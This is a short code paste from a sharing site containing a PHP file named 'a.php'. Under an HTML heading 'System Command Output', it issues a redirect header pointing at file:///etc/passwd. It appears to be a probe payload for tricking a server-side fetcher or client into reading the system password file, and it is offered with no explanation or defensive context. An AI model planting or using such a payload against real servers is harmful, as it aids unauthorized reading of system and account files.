a.php

mail@pastecode.io avatar
unknown
plain_text
a month ago
136 B
1
Indexable
Never
<!DOCTYPE html>
2
<html>
3
<body>
<h1>System Command Output:</h1>
5
<?php
header('location: file:///etc/passwd');
?>
8
</body>
9
</html>
Leave a Comment